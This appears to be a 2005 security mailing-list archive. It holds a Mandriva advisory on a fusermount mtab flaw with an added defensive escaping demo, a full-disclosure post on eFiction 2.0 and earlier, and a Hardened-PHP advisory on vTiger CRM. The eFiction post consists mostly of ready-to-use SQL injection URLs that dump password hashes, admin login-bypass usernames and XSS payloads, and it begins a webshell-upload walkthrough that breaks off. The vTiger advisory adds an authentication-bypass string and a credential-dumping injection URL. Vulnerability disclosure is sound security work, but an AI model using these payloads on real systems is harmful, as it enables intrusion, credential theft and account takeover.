MDKSA-2005:216 - Updated fuse packages fix vulnerability

2005-11-25 Thread Mandriva Security Team

 ___
 
 Mandriva Linux Security Advisory MDKSA-2005:216
 http://www.mandriva.com/security/
 ___
 
 Package : fuse
 Date: November 24, 2005
 Affected: 2006.0
 ___
 
 Problem Description:
 
 Thomas Beige found that fusermount failed to securely handle special
 characters specified in mount points, which could allow a local
 attacker to corrupt the contents of /etc/mtab by mounting over a
 maliciously-named directory using fusermount.  This could potentially
 allow the attacker to set unauthorized mount options.
 
 This is only possible when fusermount is installed setuid root, which
 is the case in Mandriva Linux.
 
 The updated packages have been patched to address these problems.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3531
 ___
 
 Updated Packages:
 
 Mandriva Linux 2006.0:
 a3ae4ac8ed8a96214bbe1801722fd68e  2006.0/RPMS/dkms-fuse-2.3.0-2.1.20060mdk.i586.rpm
 7703d6d4e053663bfa3712a6302c07be  2006.0/RPMS/fuse-2.3.0-2.1.20060mdk.i586.rpm
 4daead454fd46fb8ea95953d9a1d3b12  2006.0/RPMS/libfuse2-2.3.0-2.1.20060mdk.i586.rpm
 db457d4c29b4d8d19d34434086e12fc7  2006.0/RPMS/libfuse2-devel-2.3.0-2.1.20060mdk.i586.rpm
 86880673c11a93aa8a9001d79416f962  2006.0/RPMS/libfuse2-static-devel-2.3.0-2.1.20060mdk.i586.rpm
 88ec22000581f550f0f2c11f29e70b0c  2006.0/SRPMS/fuse-2.3.0-2.1.20060mdk.src.rpm

 Mandriva Linux 2006.0/X86_64:
 c94bfcb85845fd023fd2edfe88af55a4  x86_64/2006.0/RPMS/dkms-fuse-2.3.0-2.1.20060mdk.x86_64.rpm
 bbbfc58364a1ceaeb363428e1cd9423c  x86_64/2006.0/RPMS/fuse-2.3.0-2.1.20060mdk.x86_64.rpm
 5b0cd9cef709bfcf624b35880c5fab46  x86_64/2006.0/RPMS/lib64fuse2-2.3.0-2.1.20060mdk.x86_64.rpm
 80ba54b4cb2467f9d2045114fa859873  x86_64/2006.0/RPMS/lib64fuse2-devel-2.3.0-2.1.20060mdk.x86_64.rpm
 8aa436b1cb28f893fd68ba2fa53ae76e  x86_64/2006.0/RPMS/lib64fuse2-static-devel-2.3.0-2.1.20060mdk.x86_64.rpm
 88ec22000581f550f0f2c11f29e70b0c  x86_64/2006.0/SRPMS/fuse-2.3.0-2.1.20060mdk.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com
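A defensive illustration of the mtab problem described in the advisory, added here and not part of the Mandriva advisory or of FUSE's own code: /etc/mtab is one whitespace-separated entry per line, so a mount point containing a space or newline can smuggle in a forged entry with its own mount options unless the helper encodes those bytes with the octal escapes that getmntent(3)-style readers expect. The directory name and the mtab line layout below are constructed for the demonstration.

```python
# Added example (not Mandriva's or FUSE's code): why a setuid mount helper such
# as fusermount must escape a mount point before appending it to /etc/mtab.
# Readers of mtab decode \040 (space), \011 (tab), \012 (newline) and
# \134 (backslash), so these four bytes are the ones a writer must encode.
MTAB_ESCAPES = {" ": r"\040", "\t": r"\011", "\n": r"\012", "\\": r"\134"}

def mtab_escape(field: str) -> str:
    """Encode the bytes that would break the one-entry-per-line format."""
    return "".join(MTAB_ESCAPES.get(ch, ch) for ch in field)

def mtab_unescape(field: str) -> str:
    """Decode \\NNN octal escapes the way an mtab reader does."""
    out, i = [], 0
    while i < len(field):
        if field[i] == "\\" and len(field) >= i + 4 and all(c in "01234567" for c in field[i + 1:i + 4]):
            out.append(chr(int(field[i + 1:i + 4], 8)))
            i += 4
        else:
            out.append(field[i])
            i += 1
    return "".join(out)

def mtab_line(mountpoint: str, escape: bool) -> str:
    """One mtab entry for a FUSE mount; escape=False mimics the unpatched helper."""
    mnt = mtab_escape(mountpoint) if escape else mountpoint
    return f"fuse {mnt} fuse rw,nosuid,nodev,user=eve 0 0\n"

def parse_mtab(text: str) -> list:
    """Return (fsname, mountpoint, fstype, options) for each well-formed line."""
    entries = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) >= 4:
            entries.append((mtab_unescape(fields[0]), mtab_unescape(fields[1]), fields[2], fields[3]))
    return entries

# Constructed malicious directory name: it closes the real entry early and
# appends a forged one that drops nosuid/nodev on an arbitrary device.
EVIL_DIR = "/home/eve/mnt fuse rw 0 0\n/dev/sda1 /mnt/evil ext3 rw,suid,dev"

def demo():
    """Entries a reader sees for the unescaped and the escaped write."""
    naive = parse_mtab(mtab_line(EVIL_DIR, escape=False))   # two entries
    fixed = parse_mtab(mtab_line(EVIL_DIR, escape=True))    # one entry
    return naive, fixed
```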


eFiction <= 2.0 multiple vulnerabilities

2005-11-25 Thread retrogod
efiction <= 2.0 remote code execution / SQL injection / login bypass / cross 
site scripting / path information disclosure

software:
site: http://www.efiction.wallflowergirl.com/index.php
description: Efiction is a software program that enables users to run 
automated original or fanfiction
archives on their websites. The program is PHP and MySQL database driven and is 
released as open-source software.


i)
xss:
efiction 1.0/1.1:
http://[target]/efiction/titles.php?action=viewlistlet=scriptalert(document.cookie)/script
on version 2.0, through sql injection:
http://[target]/[path]/titles.php?action=viewlistlet='%20UNION%20SELECT%200,0,'scriptalert(document.cookie)/script',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,penname,0%20FROM%20fanfiction_authors%20/*

ii)
if magic_quotes_gpc off - SQL INJECTION:
you can see on screen any admin/user MD5 password hash

efiction 1.0:
http://[target]/[path]/authors.php?action=viewlistlet='%20UNION%20SELECT%20password,0%20FROM%20fanfiction_authors/*
http://[target]/[path]/authors.php?action=viewlistlet=%27%20UNION%20SELECT%20password,password%20FROM%20efiction_fanfiction_authors/*offset=0,40/*
http://[target]/[path]/titles.php?action=viewlistlet='%20UNION%20SELECT%200,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,penname,0%20FROM%20fanfiction_authors%20/*
http://[target]/[path]/viewstory.php?sid='%20UNION%20SELECT%200,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20fanfiction_authors%20/*
http://[target]/[path]/viewstory.php?sid='%20UNION%20SELECT%200,0,penname,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20fanfiction_authors%20/*

efiction 1.1:
http://[target]/[path]/titles.php?action=viewlistlet='%20UNION%20SELECT%200,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,penname%20FROM%20fanfiction_authors%20/*
http://[target]/[path]/titles.php?action=viewlistlet='%20UNION%20SELECT%20password,0,0,0,0,0,penname,0,0,0,0,0,0,0,0%20FROM%20fanfiction_authors%20/*
http://[target]/[path]/titles.php?action=viewlistlet='%20UNION%20SELECT%20penname,0,0,0,0,0,0,0,0,0,password,0,0,0,0%20FROM%20fanfiction_authors%20/*
http://[target]/[path]/titles.php?action=viewlistlet='%20UNION%20SELECT%200,0,0,0,0,0,0,0,0,0,password,0,0,0,0%20FROM%20efiction_fanfiction_authors%20/*
http://[target]/[path]/viewuser.php?uid='UNION%20SELECT%200,0,0,0,0,0,0,0,0,0,password,0,0,0,0%20FROM%20fanfiction_authors%20/*
http://[target]/[path]/viewstory.php?sid='%20UNION%20SELECT%200,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20efiction_fanfiction_authors%20/*
http://[target]/[path]/viewstory.php?sid='%20UNION%20SELECT%20penname,penname,password,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname%20FROM%20fanfiction_authors%20/*

efiction 2.0
http://[target]/[path]/titles.php?action=viewlistlet='%20UNION%20SELECT%200,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,penname,0%20FROM%20fanfiction_authors%20/*

iii)
if magic_quotes_gpc off - Login bypass:
you can login as admin typing:

efiction 1.0:
username: 'UNION SELECT 
'd41d8cd98f00b204e9800998ecf8427e',penname,uid,userskin,level,email FROM 
fanfiction_authors where level=1/*
password: [nothing]

efiction 1.1:
username: 'UNION SELECT 
'd41d8cd98f00b204e9800998ecf8427e',penname,uid,userskin,level,email,categories 
FROM fanfiction_authors where level=1/*
password: [nothing]

efiction 2.0:
username: 'UNION SELECT 
'd41d8cd98f00b204e9800998ecf8427e',penname,uid,userskin,level,email,categories,ageconsent
 FROM fanfiction_authors where level=1/*
password: [nothing]
(the hash 'd41d8cd98f00b204e9800998ecf8427e' above is the hash of [nothing])

iv)

remote code execution (1.0/1.1/2.0):

register, a temporary password will be sent to you by email, login, go to 
Manage Images
(or go to http://target/path/user.php?action=manageimagesupload=upload), 
choose Upload new image, upload a fake gif cmd.php
like this (this is the hexadecimal dump):


Mandriva Security

2005-11-25 Thread [at]
does anybody know how to contact Mandriva Security?
I dropped three security contact messages to [EMAIL PROTECTED], but got no 
response ... :(



Re: Advisory 23/2005: vTiger multiple vulnerabilities

2005-11-25 Thread Christopher Kunz
Hello,

Here, too:

one quick fix:
-3. Turn magic_quotes_gpc off.
+3. Turn magic_quotes_gpc on.

Regards,

--ck


Advisory 23/2005: vTiger multiple vulnerabilities

2005-11-25 Thread Christopher Kunz

Hardened PHP Project
www.hardened-php.net

  -= Security  Advisory =-


 Advisory: Multiple vulnerabilities in vTiger CRM
 Release Date: 2005/11/24
Last Modified: 2005/11/24
   Author: Christopher Kunz [EMAIL PROTECTED]
  Application: vTiger 4.2 and prior
 Severity: Cross-Site Scripting, SQL injection and information
   disclosure, password hash disclosure, authentication bypass,
   local file disclosure, remote code execution
 Risk: High / Critical (depending on server configuration)
Vendor Status: Vendor informed. No fix available.
   References: http://www.hardened-php.net/advisory_232005.105.html


Overview:

   vtiger [1] is an open source customer relationship management system (CRM)
   which is maintained by an Indian company with the same name. It has been
   forked off the SugarCRM project [2] at an earlier stage, thus a number of
   issues reported by GulfTech Security in [3] are also present in vtiger. An
   additional layer of insecurity has obviously been introduced by the
   developers, enabling malicious users to log in to the CRM without any
   credentials whatsoever and execute remote code.


Details:

   1) XSS issues-a-plenty
  As James Bercegay reported, there is an abundance of XSS problems all
  over the CRM, with only a few examples being the following:
  - a malicious local user could create a contact, lead, account, potential
    or other data set that includes script code in any field. Typical fields
    would be first or last name, but nearly every other field is possible,
    too. Then, the malicious user could send the link to that contact to the
    administrator - and have the script code do whatever DOM operation is
    necessary to elevate privileges.
  - Even easier and without any inside knowledge needed:
    /index.php?action=DetailViewmodule=Leadsrecord=%3Cscript%3Ealert
    ('document.cookie')%3C/script%3E (as reported by James).
  - Since the variable $_SERVER['PHP_SELF'] is used for most form actions,
    and also for creating internal links, the string <script>alert('xss')
    </script> can be used to create a path-info XSS that exploits any
    logged-in user. The URI parameters are irrelevant and have been
    omitted to keep the example clean.
    Example:
    /index.php/%22%3E%3Cscript%3Ealert('xss')%3C/script%3E/?[params]

   2) Remote XSS in RSS
  vtiger features a comprehensive RSS aggregation module, allowing users
  to read all their favorite blogs, news sites or other feeds from within
  the CRM. However, no input checking is performed before aggregated feeds
  are sent to the client. A malicious blog, news site or other feed could
  socially engineer a user into aggregating it and then use script code to
  elevate their privileges via DOM.
  We are featuring this as a different attack class since the vector does
  not require the CRM user to click on any links - being subscribed to a
  seemingly interesting blog is enough to fall victim to this attack.

   3) Authentication Bypass
  If the php.ini setting magic_quotes_gpc is set to Off, which is the
  setting provided in php.ini-recommended, an attacker can bypass the
  authentication process completely, by entering a fabricated user name.
  Since the login form is prone to SQL injection (like any other form),
  a username like foo' or '%'=' leads to the following SQL statement:
  SELECT *
  FROM   users
  WHERE  user_name='admin'
  OR     '%'='%'
  AND    user_password='adAZ2jidC3H1M'
  This query returns 1 row with the administrator's credentials. This result
  set is used to determine that authentication was successful.
  The attacker is now logged into the CRM system as the administrator and
  can perform tasks like uploading the whole CRM instance to a remote system,
  display system information - and of course mess around with the
  customer data.

   4) User credential disclosure via SQL Injection
  Again, if magic_quotes_gpc is Off, a logged-in user can manipulate many
  form fields into displaying arbitrary values, including user names and
  passwords. Again, similar issues were reported by GulfTech - we have
  found some more injection vulnerabilities like this one:
  /?ticket_title=contact_name=priority=status=action=indexquery=truem
  odule=HelpDeskorder_by=sorder=ASCviewname=0button=Searchcategory=da
  te_crit=isdate=%27+UNION+SELECT+56%2CCONCAT%28user_name%2C+%22%3A%22%2C+
  user_password%29%2C+%22Open%22%2C%22Normal%22%2C1%2C1%2C1%2C1%2C1%2C1%2C1